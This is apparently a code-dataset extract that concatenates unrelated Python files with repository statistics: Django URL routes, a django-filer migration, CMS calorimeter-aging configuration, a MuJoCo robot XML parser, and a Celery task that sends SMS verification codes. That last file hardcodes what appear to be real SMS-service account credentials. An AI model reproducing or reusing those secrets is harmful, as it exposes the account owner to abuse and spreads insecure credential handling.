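For orientation, a hypothetical sketch of how the parent eight_sleep integration would hand off to this platform; async_setup_platform above returns early unless discovery supplies discovery_info:

from homeassistant.helpers.discovery import async_load_platform

async def _forward_to_binary_sensor(hass, config):
    # Triggers async_setup_platform above with a non-None discovery_info.
    hass.async_create_task(
        async_load_platform(hass, "binary_sensor", "eight_sleep", {}, config)
    )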
| 28.805556 | 81 | 0.700579 | 220 | 2,074 | 6.368182 | 0.390909 | 0.060671 | 0.031406 | 0.025696 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.217454 | 2,074 | 71 | 82 | 29.211268 | 0.863216 | 0.07377 | 0 | 0.078431 | 0 | 0 | 0.027464 | 0 | 0 | 0 | 0 | 0 | 0.039216 | 1 | 0.039216 | false | 0 | 0.196078 | 0 | 0.313725 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
| 868d3680b0c2bd4371570ee9b629404359f69eee | 1,220 | py | Python | apps/organization/urls.py | stormsha/StormOnline | 10983b7a9ee09958927731ee3fd74178d7534ff6 | ["Apache-2.0"] | 18 | 2018-03-16T07:11:01.000Z | 2021-11-18T08:42:11.000Z | apps/organization/urls.py | stormsha/StormOnline | 10983b7a9ee09958927731ee3fd74178d7534ff6 | ["Apache-2.0"] | 1 | 2018-03-15T11:40:25.000Z | 2018-03-15T11:40:25.000Z | apps/organization/urls.py | stormsha/StormOnline | 10983b7a9ee09958927731ee3fd74178d7534ff6 | ["Apache-2.0"] | 13 | 2018-03-16T07:11:05.000Z | 2020-06-23T09:27:49.000Z |
# _*_ coding: utf-8 _*_
# ---------------------------
__author__ = 'StormSha'
__date__ = '2018/3/28 18:01'
# ---------------------------
# -------------------------django----------------------
from django.conf.urls import url
from .views import OrgView, AddUserAskView, OrgHomeView, OrgCourseView, OrgDescView, OrgTeacherView, AddFavView
from .views import TeacherListView, TeacherDetailView
urlpatterns = [
url(r'^list/$', OrgView.as_view(), name="org_list"),
url(r'^add_ask/$', AddUserAskView.as_view(), name="add_ask"),
url(r'^home/(?P<org_id>\d+)/$', OrgHomeView.as_view(), name="org_home"),
url(r'^course/(?P<org_id>\d+)/$', OrgCourseView.as_view(), name="org_course"),
url(r'^desc/(?P<org_id>\d+)/$', OrgDescView.as_view(), name="org_desc"),
url(r'^org_teacher/(?P<org_id>\d+)/$', OrgTeacherView.as_view(), name="org_teacher"),
    # ----------------- organization favorites -----------------
url(r'^add_fav/$', AddFavView.as_view(), name="add_fav"),
# -----------------------teacher------------------------------
url(r'^teacher/list/$', TeacherListView.as_view(), name="teacher_list"),
url(r'^teacher/detail/(?P<teacher_id>\d+)/$', TeacherDetailView.as_view(), name="teacher_detail")
]
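A short sketch of reversing these named routes from a view or test; whether a namespace prefix (e.g. 'org:org_home') is required depends on how this URLconf is included, which is outside this file:

from django.urls import reverse

org_home_url = reverse('org_home', kwargs={'org_id': 1})  # e.g. '/org/home/1/' if mounted under org/
teacher_list_url = reverse('teacher_list')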
| 48.8 | 111 | 0.566393 | 142 | 1,220 | 4.598592 | 0.323944 | 0.05513 | 0.137825 | 0.099541 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010889 | 0.096721 | 1,220 | 25 | 112 | 48.8 | 0.58167 | 0.193443 | 0 | 0 | 0 | 0 | 0.294479 | 0.141104 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1875 | 0 | 0.1875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
| 868dd694341f559c01703d972c3b261cb6620ffe | 571 | py | Python | tech_project/lib/python2.7/site-packages/filer/migrations/0010_auto_20180414_2058.py | priyamshah112/Project-Descripton-Blog | 8e01016c6be79776c4f5ca75563fa3daa839e39e | ["MIT"] | null | null | null | tech_project/lib/python2.7/site-packages/filer/migrations/0010_auto_20180414_2058.py | priyamshah112/Project-Descripton-Blog | 8e01016c6be79776c4f5ca75563fa3daa839e39e | ["MIT"] | 11 | 2019-11-02T20:57:52.000Z | 2020-09-27T09:08:33.000Z | tech_project/lib/python2.7/site-packages/filer/migrations/0010_auto_20180414_2058.py | priyamshah112/Project-Descripton-Blog | 8e01016c6be79776c4f5ca75563fa3daa839e39e | ["MIT"] | 4 | 2018-08-07T17:13:48.000Z | 2019-06-13T11:09:32.000Z |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('filer', '0009_auto_20171220_1635'),
]
operations = [
migrations.AlterField(
model_name='image',
name='file_ptr',
field=models.OneToOneField(primary_key=True, serialize=False, related_name='filer_image_file', parent_link=True, to='filer.File', on_delete=django.db.models.deletion.CASCADE),
),
]
| 27.190476 | 187 | 0.670753 | 64 | 571 | 5.734375 | 0.65625 | 0.065395 | 0.076294 | 0.119891 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037611 | 0.208406 | 571 | 20 | 188 | 28.55 | 0.774336 | 0.036778 | 0 | 0 | 0 | 0 | 0.122263 | 0.041971 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.214286 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
| 868dd7b75196bf80f589754ce91dc36872de638a | 12,166 | py | Python | SLHCUpgradeSimulations/Configuration/python/aging.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | ["Apache-2.0"] | 852 | 2015-01-11T21:03:51.000Z | 2022-03-25T21:14:00.000Z | SLHCUpgradeSimulations/Configuration/python/aging.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | ["Apache-2.0"] | 30,371 | 2015-01-02T00:14:40.000Z | 2022-03-31T23:26:05.000Z | SLHCUpgradeSimulations/Configuration/python/aging.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | ["Apache-2.0"] | 3,240 | 2015-01-02T05:53:18.000Z | 2022-03-31T17:24:21.000Z |
import FWCore.ParameterSet.Config as cms
# handle normal mixing or premixing
def getHcalDigitizer(process):
if hasattr(process,'mixData'):
return process.mixData
if hasattr(process,'mix') and hasattr(process.mix,'digitizers') and hasattr(process.mix.digitizers,'hcal'):
return process.mix.digitizers.hcal
return None
def getHGCalDigitizer(process,section):
if hasattr(process,'mix') and hasattr(process.mix,'digitizers'):
if section == 'EE' and hasattr(process.mix.digitizers,'hgceeDigitizer'):
return process.mix.digitizers.hgceeDigitizer
elif section == 'FH' and hasattr(process.mix.digitizers,'hgchefrontDigitizer'):
return process.mix.digitizers.hgchefrontDigitizer
elif section == 'BH' and hasattr(process.mix.digitizers,'hgchebackDigitizer'):
return process.mix.digitizers.hgchebackDigitizer
elif section == 'HFNose' and hasattr(process.mix.digitizers,'hfnoseDigitizer'):
return process.mix.digitizers.hfnoseDigitizer
return None
# change assumptions about lumi rate
def setScenarioHLLHC(module,scenarioHLLHC):
if scenarioHLLHC=="nominal":
from CalibCalorimetry.HcalPlugins.HBHEDarkening_cff import _years_LHC, _years_HLLHC_nominal
module.years = _years_LHC + _years_HLLHC_nominal
elif scenarioHLLHC=="ultimate":
from CalibCalorimetry.HcalPlugins.HBHEDarkening_cff import _years_LHC, _years_HLLHC_ultimate
module.years = _years_LHC + _years_HLLHC_ultimate
return module
# turnon = True enables default, False disables
# recalibration and darkening always together
def ageHB(process,turnon,scenarioHLLHC):
if turnon:
from CalibCalorimetry.HcalPlugins.HBHEDarkening_cff import HBDarkeningEP
process.HBDarkeningEP = HBDarkeningEP
process.HBDarkeningEP = setScenarioHLLHC(process.HBDarkeningEP,scenarioHLLHC)
hcaldigi = getHcalDigitizer(process)
if hcaldigi is not None: hcaldigi.HBDarkening = cms.bool(turnon)
if hasattr(process,'es_hardcode'):
process.es_hardcode.HBRecalibration = cms.bool(turnon)
return process
def ageHE(process,turnon,scenarioHLLHC):
if turnon:
from CalibCalorimetry.HcalPlugins.HBHEDarkening_cff import HEDarkeningEP
process.HEDarkeningEP = HEDarkeningEP
process.HEDarkeningEP = setScenarioHLLHC(process.HEDarkeningEP,scenarioHLLHC)
hcaldigi = getHcalDigitizer(process)
if hcaldigi is not None: hcaldigi.HEDarkening = cms.bool(turnon)
if hasattr(process,'es_hardcode'):
process.es_hardcode.HERecalibration = cms.bool(turnon)
return process
def ageHF(process,turnon):
hcaldigi = getHcalDigitizer(process)
if hcaldigi is not None: hcaldigi.HFDarkening = cms.bool(turnon)
if hasattr(process,'es_hardcode'):
process.es_hardcode.HFRecalibration = cms.bool(turnon)
return process
def agedHFNose(process,algo=0):
from SimCalorimetry.HGCalSimProducers.hgcalDigitizer_cfi import HFNose_setEndOfLifeNoise
process = HFNose_setEndOfLifeNoise(process,byDose=True,byDoseAlgo=algo)
return process
def agedHGCal(process,algo=0):
from SimCalorimetry.HGCalSimProducers.hgcalDigitizer_cfi import HGCal_setEndOfLifeNoise
process = HGCal_setEndOfLifeNoise(process,byDose=True,byDoseAlgo=algo)
return process
def realisticHGCalStartup(process):
from SimCalorimetry.HGCalSimProducers.hgcalDigitizer_cfi import HGCal_setRealisticStartupNoise
process = HGCal_setRealisticStartupNoise(process)
return process
# needs lumi to set proper ZS thresholds (tbd)
def ageSiPM(process,turnon,lumi):
process.es_hardcode.hbUpgrade.doRadiationDamage = turnon
process.es_hardcode.heUpgrade.doRadiationDamage = turnon
# todo: determine ZS threshold adjustments
# adjust PF thresholds for increased noise
# based on: https://baylor.box.com/s/w32ja75krcbxcycyifexu28dwlgrj7wg
hcal_lumis = [300, 1000, 3000, 4500, 1e10]
hcal_thresholds = {
300: {
"seed": [0.5, 0.625, 0.75, 0.75],
"rec": [0.4, 0.5, 0.6, 0.6],
},
1000: {
"seed": [1.0, 1.5, 1.5, 1.5],
"rec": [0.8, 1.2, 1.2, 1.2],
},
3000: {
"seed": [1.25, 2.5, 2.5, 2.5],
"rec": [1.0, 2.0, 2.0, 2.0],
},
4500: {
"seed": [1.5, 3.0, 3.0, 3.0],
"rec": [1.25, 2.5, 2.5, 2.5],
},
}
ctmodules = ['calotowermaker','caloTowerForTrk','caloTowerForTrkPreSplitting','towerMaker','towerMakerWithHO']
for ilumi, hcal_lumi in enumerate(hcal_lumis[:-1]):
if lumi >= hcal_lumi and lumi < hcal_lumis[ilumi+1]:
if hasattr(process,'particleFlowClusterHBHE'):
process.particleFlowClusterHBHE.seedFinder.thresholdsByDetector[0].seedingThreshold = hcal_thresholds[hcal_lumi]["seed"]
process.particleFlowClusterHBHE.initialClusteringStep.thresholdsByDetector[0].gatheringThreshold = hcal_thresholds[hcal_lumi]["rec"]
process.particleFlowClusterHBHE.pfClusterBuilder.recHitEnergyNorms[0].recHitEnergyNorm = hcal_thresholds[hcal_lumi]["rec"]
process.particleFlowClusterHBHE.pfClusterBuilder.positionCalc.logWeightDenominatorByDetector[0].logWeightDenominator = hcal_thresholds[hcal_lumi]["rec"]
process.particleFlowClusterHBHE.pfClusterBuilder.allCellsPositionCalc.logWeightDenominatorByDetector[0].logWeightDenominator = hcal_thresholds[hcal_lumi]["rec"]
if hasattr(process,'particleFlowClusterHCAL'):
process.particleFlowClusterHCAL.pfClusterBuilder.allCellsPositionCalc.logWeightDenominatorByDetector[0].logWeightDenominator = hcal_thresholds[hcal_lumi]["rec"]
if hasattr(process,'particleFlowRecHitHBHE'):
process.particleFlowRecHitHBHE.producers[0].qualityTests[0].cuts[0].threshold = hcal_thresholds[hcal_lumi]["rec"]
for ctmod in ctmodules:
if hasattr(process,ctmod):
getattr(process,ctmod).HBThreshold1 = hcal_thresholds[hcal_lumi]["rec"][0]
getattr(process,ctmod).HBThreshold2 = hcal_thresholds[hcal_lumi]["rec"][1]
getattr(process,ctmod).HBThreshold = hcal_thresholds[hcal_lumi]["rec"][-1]
break
return process
def ageHcal(process,lumi,instLumi,scenarioHLLHC):
hcaldigi = getHcalDigitizer(process)
if hcaldigi is not None: hcaldigi.DelivLuminosity = cms.double(float(lumi)) # integrated lumi in fb-1
# these lines need to be further activated by turning on 'complete' aging for HF
if hasattr(process,'g4SimHits'):
process.g4SimHits.HCalSD.InstLuminosity = cms.double(float(instLumi))
process.g4SimHits.HCalSD.DelivLuminosity = cms.double(float(lumi))
# recalibration and darkening always together
if hasattr(process,'es_hardcode'):
process.es_hardcode.iLumi = cms.double(float(lumi))
# functions to enable individual subdet aging
process = ageHB(process,True,scenarioHLLHC)
process = ageHE(process,True,scenarioHLLHC)
process = ageHF(process,True)
process = ageSiPM(process,True,lumi)
return process
def turn_on_HB_aging(process):
process = ageHB(process,True,"")
return process
def turn_off_HB_aging(process):
process = ageHB(process,False,"")
return process
def turn_on_HE_aging(process):
process = ageHE(process,True,"")
return process
def turn_off_HE_aging(process):
process = ageHE(process,False,"")
return process
def turn_on_HF_aging(process):
process = ageHF(process,True)
return process
def turn_off_HF_aging(process):
process = ageHF(process,False)
return process
def turn_off_SiPM_aging(process):
process = ageSiPM(process,False,0.0)
return process
def hf_complete_aging(process):
if hasattr(process,'g4SimHits'):
process.g4SimHits.HCalSD.HFDarkening = cms.untracked.bool(True)
hcaldigi = getHcalDigitizer(process)
if hcaldigi is not None: hcaldigi.HFDarkening = cms.untracked.bool(False)
return process
def ageEcal(process,lumi,instLumi):
if hasattr(process,'g4SimHits'):
        # these lines need to be further activated by turning on 'complete' aging for ECAL
process.g4SimHits.ECalSD.InstLuminosity = cms.double(instLumi)
process.g4SimHits.ECalSD.DelivLuminosity = cms.double(float(lumi))
# available conditions
ecal_lumis = [300,1000,3000,4500]
ecal_conditions = [
['EcalIntercalibConstantsRcd','EcalIntercalibConstants_TL{:d}_upgrade_8deg_v2_mc'],
['EcalIntercalibConstantsMCRcd','EcalIntercalibConstantsMC_TL{:d}_upgrade_8deg_v2_mc'],
['EcalLaserAPDPNRatiosRcd','EcalLaserAPDPNRatios_TL{:d}_upgrade_8deg_mc'],
['EcalPedestalsRcd','EcalPedestals_TL{:d}_upgradeTIA_8deg_mc'],
['EcalTPGLinearizationConstRcd','EcalTPGLinearizationConst_TL{:d}_upgrade_8deg_mc'],
]
# update PF thresholds, based on https://indico.cern.ch/event/653123/contributions/2659235/attachments/1491385/2318364/170711_upsg_ledovskoy.pdf
ecal_thresholds = {
300 : 0.103,
1000 : 0.175,
3000 : 0.435,
4500 : 0.707,
}
ecal_seed_multiplier = 2.5
# try to get conditions
if int(lumi) in ecal_lumis:
if not hasattr(process.GlobalTag,'toGet'):
process.GlobalTag.toGet=cms.VPSet()
for ecal_condition in ecal_conditions:
process.GlobalTag.toGet.append(cms.PSet(
record = cms.string(ecal_condition[0]),
tag = cms.string(ecal_condition[1].format(int(lumi))),
connect = cms.string("frontier://FrontierProd/CMS_CONDITIONS")
)
)
if hasattr(process,"particleFlowClusterECALUncorrected"):
_seeds = process.particleFlowClusterECALUncorrected.seedFinder.thresholdsByDetector
for iseed in range(0,len(_seeds)):
if _seeds[iseed].detector.value()=="ECAL_BARREL":
_seeds[iseed].seedingThreshold = cms.double(ecal_thresholds[int(lumi)]*ecal_seed_multiplier)
_clusters = process.particleFlowClusterECALUncorrected.initialClusteringStep.thresholdsByDetector
for icluster in range(0,len(_clusters)):
if _clusters[icluster].detector.value()=="ECAL_BARREL":
_clusters[icluster].gatheringThreshold = cms.double(ecal_thresholds[int(lumi)])
return process
def ecal_complete_aging(process):
if hasattr(process,'g4SimHits'):
process.g4SimHits.ECalSD.AgeingWithSlopeLY = cms.untracked.bool(True)
if hasattr(process,'ecal_digi_parameters'):
process.ecal_digi_parameters.UseLCcorrection = cms.untracked.bool(False)
return process
def customise_aging_300(process):
process=ageHcal(process,300,5.0e34,"nominal")
process=ageEcal(process,300,5.0e34)
return process
def customise_aging_1000(process):
process=ageHcal(process,1000,5.0e34,"nominal")
process=turn_off_HE_aging(process) #avoid conflict between HGCal and Hcal in phase2 geom configuration
process=ageEcal(process,1000,5.0e34)
return process
def customise_aging_3000(process):
process=ageHcal(process,3000,5.0e34,"nominal")
process=turn_off_HE_aging(process) #avoid conflict between HGCal and Hcal in phase2 geom configuration
process=ageEcal(process,3000,5.0e34)
process=agedHGCal(process)
process=agedHFNose(process)
return process
def customise_aging_3000_ultimate(process):
process=ageHcal(process,3000,7.5e34,"ultimate")
process=turn_off_HE_aging(process) #avoid conflict between HGCal and Hcal in phase2 geom configuration
process=ageEcal(process,3000,7.5e34)
process=agedHGCal(process)
process=agedHFNose(process)
return process
def customise_aging_4500_ultimate(process):
process=ageHcal(process,4500,7.5e34,"ultimate")
process=turn_off_HE_aging(process) #avoid conflict between HGCal and Hcal in phase2 geom configuration
process=ageEcal(process,4500,7.5e34)
process=agedHGCal(process)
process=agedHFNose(process)
return process
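For context, a sketch of how these hooks are typically attached to a workflow: cmsDriver.py's --customise flag imports the named function and calls it on the fully built process, e.g. --customise SLHCUpgradeSimulations/Configuration/aging.customise_aging_3000. Done by hand it looks like this (the process is assumed to be complete, since the helpers above probe it with hasattr):

from SLHCUpgradeSimulations.Configuration.aging import customise_aging_3000

def apply_aging(process):
    # 'process' must already carry digitizers, GlobalTag and PF clustering modules
    return customise_aging_3000(process)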
| 44.40146 | 176 | 0.715025 | 1,347 | 12,166 | 6.331106 | 0.213066 | 0.044207 | 0.0394 | 0.025797 | 0.504573 | 0.418386 | 0.355183 | 0.304526 | 0.268293 | 0.211069 | 0 | 0.033714 | 0.185681 | 12,166 | 273 | 177 | 44.564103 | 0.827092 | 0.088279 | 0 | 0.235294 | 0 | 0 | 0.083642 | 0.045344 | 0 | 0 | 0 | 0.003663 | 0 | 1 | 0.117647 | false | 0 | 0.036199 | 0 | 0.298643 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
| 868de8e68215f41c7a22fbffe3549ae81cd16557 | 10,106 | py | Python | xml_parser.py | cbschaff/nlimb | f0564b00bab1b3367aaa88163e49bebc88f349bb | ["MIT"] | 12 | 2018-10-26T19:33:05.000Z | 2022-01-17T11:47:59.000Z | xml_parser.py | cbschaff/nlimb | f0564b00bab1b3367aaa88163e49bebc88f349bb | ["MIT"] | 9 | 2020-01-28T22:30:55.000Z | 2022-03-11T23:32:04.000Z | xml_parser.py | cbschaff/nlimb | f0564b00bab1b3367aaa88163e49bebc88f349bb | ["MIT"] | 3 | 2019-07-09T14:56:01.000Z | 2019-11-18T06:58:41.000Z |
import numpy as np
import xml.etree.ElementTree as ET
class Geom(object):
def __init__(self, geom):
self.xml = geom
self.params = []
def get_params(self):
return self.params.copy()
def set_params(self, new_params):
self.params = new_params
def update_point(self, p, new_params):
pass
def update_xml(self):
pass
def update(self, new_params):
self.set_params(new_params)
self.update_xml()
def get_smallest_z(self):
pass
def get_param_limits(self):
pass
def get_param_names(self):
pass
def get_volume(self):
pass
class Sphere(Geom):
min_radius = .05
max_radius = .4
def __init__(self, geom):
self.xml = geom
self.params = [float(self.xml.get('size'))] # radius
self.center = np.array([float(x) for x in self.xml.get('pos').split()])
def update_point(self, p, new_params):
return ((p - self.center) * new_params[0] / self.params[0]) + self.center
def update_xml(self):
self.xml.set('size', str(self.params[0]))
def get_smallest_z(self):
return self.center[2] - self.params[0]
def get_param_limits(self):
return [[self.min_radius], [self.max_radius]]
def get_param_names(self):
return ['radius']
def get_volume(self):
return 4./3. * np.pi * self.params[0] ** 3
class Capsule(Geom):
min_length = 0.175
max_length = 0.8
min_radius = 0.035
max_radius = 0.085
def __init__(self, geom):
self.xml = geom
fromto = [float(x) for x in self.xml.get('fromto').split()]
self.p1 = np.array(fromto[:3])
self.p2 = np.array(fromto[3:])
length = np.sqrt(np.sum((self.p2 - self.p1) ** 2))
radius = float(self.xml.get('size'))
self.params = [length, radius]
self.axis = (self.p2 - self.p1) / length
def update_point(self, p, new_params):
lfac = p.dot(self.axis) * self.axis
rfac = p - lfac
return p + lfac * (-1.0 + new_params[0] / self.params[0])# + rfac * (new_params[1] / self.params[1])
def update_xml(self):
self.xml.set('fromto', ' '.join([str(x) for x in np.concatenate([self.p1, self.p2])]))
self.xml.set('size', str(self.params[1])) # radius
def set_params(self, new_params):
p1 = self.update_point(self.p1, new_params)
p2 = self.update_point(self.p2, new_params)
# update only after computing p1, p2
self.p1 = p1
self.p2 = p2
super().set_params(new_params)
def get_smallest_z(self):
return min(self.p1[2], self.p2[2]) - self.params[1]
def get_param_limits(self):
return [[self.min_length, self.min_radius], [self.max_length, self.max_radius]]
def get_param_names(self):
return ['length','radius']
def get_volume(self):
return 4./3. * np.pi * self.params[1]**3 + self.params[0] * np.pi * self.params[1]**2
class Body:
geoms = {'sphere': Sphere, 'capsule': Capsule} # dictionary of legal geometry types
def __init__(self, body, worldbody=False):
self.xml = body
self.worldbody = worldbody
geom_xml = body.find('geom') # assume only one geometry per body
self.geom = self.geoms[geom_xml.get('type')](geom_xml)
self.joints = [j for j in body.findall('joint') if 'ignore' not in j.get('name')]
self.parts = [Body(b) for b in body.findall('body')]
pos = [b.get('pos') for b in body.findall('body')]
self.part_positions = [np.array([float(x) for x in p.split()]) for p in pos]
pos = [j.get('pos') for j in self.joints]
self.joint_positions = [np.array([float(x) for x in p.split()]) for p in pos]
self.n = len(self.geom.get_params())
self.n_all_params = len(self.get_params())
self.zmin = float(self.xml.get("pos").split()[2]) - self.get_height()
def get_height(self):
max_height = -self.geom.get_smallest_z()
for body, pos in zip(self.parts, self.part_positions):
max_height = max(max_height, body.get_height() - pos[2])
return max_height
def update_initial_position(self):
pos = self.xml.get("pos").split()
pos[2] = str(self.get_height() + self.zmin)
self.xml.set("pos", ' '.join(pos))
def update_xml(self):
for body, pos in zip(self.parts, self.part_positions):
body.xml.set('pos', ' '.join([str(x) for x in pos]))
for joint, pos in zip(self.joints, self.joint_positions):
joint.set('pos', ' '.join([str(x) for x in pos]))
def set_body_positions(self, new_params):
for i, pos in enumerate(self.part_positions):
self.part_positions[i] = self.geom.update_point(pos, new_params)
for i, pos in enumerate(self.joint_positions):
self.joint_positions[i] = self.geom.update_point(pos, new_params)
def update(self, new_params):
self.set_body_positions(new_params)
self.geom.update(new_params)
self.update_xml()
def get_params(self):
params = self.geom.get_params()
for body in self.parts:
params += body.get_params()
return params
def get_param_limits(self):
limits = self.geom.get_param_limits()
for body in self.parts:
body_limits = body.get_param_limits()
limits[0] += body_limits[0]
limits[1] += body_limits[1]
return limits
def get_param_names(self):
name = self.xml.get('name')
param_names = [name + '-' + p for p in self.geom.get_param_names()]
for body in self.parts:
param_names += body.get_param_names()
return param_names
def update_params(self, new_params):
if self.worldbody: assert len(new_params) == self.n_all_params, "Wrong number of parameters"
self.update(new_params[:self.n])
remaining_params = new_params[self.n:]
for body in self.parts:
remaining_params = body.update_params(remaining_params)
if self.worldbody:
self.update_initial_position()
else:
return remaining_params
def get_body_names(self):
names = [self.xml.get('name')]
for body in self.parts:
            names += body.get_body_names()
return names
def get_joints(self):
joints = {}
for body,pos in zip(self.parts, self.part_positions):
for j in body.joints:
joints[j.get('name')] = (self.xml.get('name'), body.xml.get('name'), self.geom, body.geom, pos)
joints.update(body.get_joints())
return joints
def get_volumes(self):
volumes = {}
if len(self.joints) > 0:
for j in self.joints:
v1 = self.geom.get_volume()
v2 = sum([b.geom.get_volume() for b in self.parts])
volumes[j.get('name')] = np.array((v1, v2))
for body in self.parts:
volumes.update(body.get_volumes())
return volumes
class MuJoCoXmlRobot:
def __init__(self, model_xml):
self.model_xml = model_xml
self.tree = ET.parse(self.model_xml)
worldbody = self.tree.getroot().find('worldbody')
self.body = Body(worldbody.find('body'), worldbody=True)
def get_params(self):
return self.body.get_params()
def get_param_limits(self):
return self.body.get_param_limits()
def get_param_names(self):
return self.body.get_param_names()
def get_height(self):
return self.body.get_height()
def get_joints(self):
return self.body.get_joints()
def get_volumes(self):
return self.body.get_volumes()
def update(self, params, xml_file=None):
if xml_file is None:
xml_file = self.model_xml
self.body.update_params(list(params))
self.tree.write(xml_file)
if __name__ == '__main__':
robot = MuJoCoXmlRobot('mujoco_assets/hopper.xml')
params = list(1.0 * np.array(robot.get_params()))
robot.update(params, 'mujoco_assets/hopper_test.xml')
assert robot.get_params() == params
#assert robot.get_height() == 1.31
print(robot.get_param_limits())
print(robot.get_param_names())
robot = MuJoCoXmlRobot('mujoco_assets/walker2d.xml')
params = [.4,.04,.5,.05,.55,.055,.6,.06,.5,.05,.55,.055,.6,.06]
robot.update(params, 'mujoco_assets/walker2d_test.xml')
assert robot.get_params() == params
assert robot.get_height() == 1.31
print(robot.get_param_limits())
print(robot.get_param_names())
robot = MuJoCoXmlRobot('mujoco_assets/ant.xml')
params = [.2, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06]
robot.update(params, 'mujoco_assets/ant_test.xml')
assert robot.get_params() == params
assert robot.get_height() == .2
print(robot.get_param_limits())
print(robot.get_param_names())
robot = MuJoCoXmlRobot('mujoco_assets/humanoid.xml')
params = list(.8 * np.array(robot.get_params()))
robot.update(params, 'mujoco_assets/humanoid_test.xml')
assert robot.get_params() == params
print(robot.get_height())
#assert robot.get_height() == .6085
print(robot.get_param_limits())
print(robot.get_param_names())
import gym, roboschool
env = gym.make("RoboschoolHopper-v1")
env.unwrapped.model_xml = 'mujoco_assets/hopper_test.xml'
env.reset()
#env.render()
import os
    from scipy.misc import imsave  # note: scipy.misc.imsave requires SciPy < 1.2
import subprocess as sp
outdir = 'xml_vid'
os.makedirs(outdir, exist_ok=True)
i = 0
for _ in range(10):
env.reset()
for _ in range(100):
env.step(env.action_space.sample())
rgb = env.render('rgb_array')
imsave(os.path.join(outdir, '{:05d}.png'.format(i)), rgb)
i+=1
sp.call(['ffmpeg', '-r', '60', '-f', 'image2', '-i', os.path.join(outdir, '%05d.png'), '-vcodec', 'libx264', '-pix_fmt', 'yuv420p', os.path.join(outdir, 'out.mp4')])
env.close()
| 33.574751 | 169 | 0.608351 | 1,449 | 10,106 | 4.069703 | 0.132505 | 0.026454 | 0.028489 | 0.024419 | 0.474818 | 0.374089 | 0.290487 | 0.224182 | 0.196201 | 0.149059 | 0 | 0.023403 | 0.247378 | 10,106 | 300 | 170 | 33.686667 | 0.751906 | 0.02355 | 0 | 0.306723 | 0 | 0 | 0.054981 | 0.02465 | 0 | 0 | 0 | 0 | 0.029412 | 1 | 0.193277 | false | 0.02521 | 0.02521 | 0.067227 | 0.37395 | 0.037815 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
| 868f0e1cedcadcbc2d277dd9469765ca291fed6d | 689 | py | Python | meiduo_mall/celery_tasks/sms/tasks.py | Vent-Any/meiduo_mall_cangku | 5b3b7f029be267cb5d2d3666f99be166d27213f1 | ["MIT"] | null | null | null | meiduo_mall/celery_tasks/sms/tasks.py | Vent-Any/meiduo_mall_cangku | 5b3b7f029be267cb5d2d3666f99be166d27213f1 | ["MIT"] | null | null | null | meiduo_mall/celery_tasks/sms/tasks.py | Vent-Any/meiduo_mall_cangku | 5b3b7f029be267cb5d2d3666f99be166d27213f1 | ["MIT"] | null | null | null |
from ronglian_sms_sdk import SmsSDK
from celery_tasks.main import app
# Define our task as a plain function.
# A task must be decorated with the Celery app instance's @task decorator.
# Tasks living in a task package are picked up by Celery's autodiscovery (configured in main).
@app.task
def celery_send_sms_code(mobile, sms_code):
accId = '8a216da8762cb4570176c60593ba35ec'
accToken = '514a8783b8c2481ebbeb6a814434796f'
appId = '8a216da8762cb4570176c605948c35f2'
    # 9.1. Create the Ronglian Cloud SDK instance
sdk = SmsSDK(accId, accToken, appId)
    tid = '1'  # SMS template id; must be '1' for trial accounts
    mobile = '%s' % mobile  # 'phone1,phone2': recipient list; trial accounts may only text registered test numbers
    datas = (sms_code, 10)  # ('var1', 'var2'): values substituted into the template
    # Template text: "Your verification code is {1}, please enter it within {2} minutes"
    # e.g. "Your verification code is 666999, please enter it within 5 minutes"
    # 9.2. Send the SMS
sdk.sendMessage(tid, mobile, datas)
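A minimal sketch of enqueueing this task from web code (the six-digit code generation is illustrative; broker configuration lives in celery_tasks.main):

from random import randint
from celery_tasks.sms.tasks import celery_send_sms_code

sms_code = '%06d' % randint(0, 999999)  # illustrative code generation
celery_send_sms_code.delay('13800000000', sms_code)  # .delay() enqueues; a worker calls the SDK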
